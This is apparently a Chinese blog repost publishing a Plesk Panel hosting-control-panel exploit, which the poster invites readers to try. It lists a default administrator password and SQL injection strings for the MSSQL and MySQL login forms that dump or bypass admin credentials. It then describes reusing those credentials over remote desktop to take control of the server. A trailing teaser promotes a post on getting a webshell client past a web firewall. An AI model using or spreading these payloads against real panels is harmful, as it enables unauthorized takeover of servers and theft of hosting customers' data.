其实这个漏洞,一年前一个朋友就告诉我了,一直也没怎么玩这个。
我也没怎么太多去试,具体利用好象有点点麻烦,看到别人都已经放出来了,我也丢出来吧,大家去试吧。
1、在 http://xxxxxx.com:8880 这里,默认的管理员账户密码是 admin,密码:stepu。
2、在 https://xxxxx.com:8443
Mssql 版本
账号: ' union select top 1 login+char(124)+passwd from admin_aliases--
报错,爆出账号密码。
登陆后 server-->remote desktop 账号密码一样,拿到服务器权限。
Mysql 版本:
'union select '-1 union select 1,1,1#'# 密码填:1
文章来源于lcx.cc:Plesk Panel 虚拟主机管理平台 0day - Exp
我是如何让菜刀无视安全狗的! Sunshie (博客求大牛友链http://phpinfo.me) | 2014-02-01 13:24 需要准备的东西: ************************************** 原版菜刀一个 PHP+Ap…
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论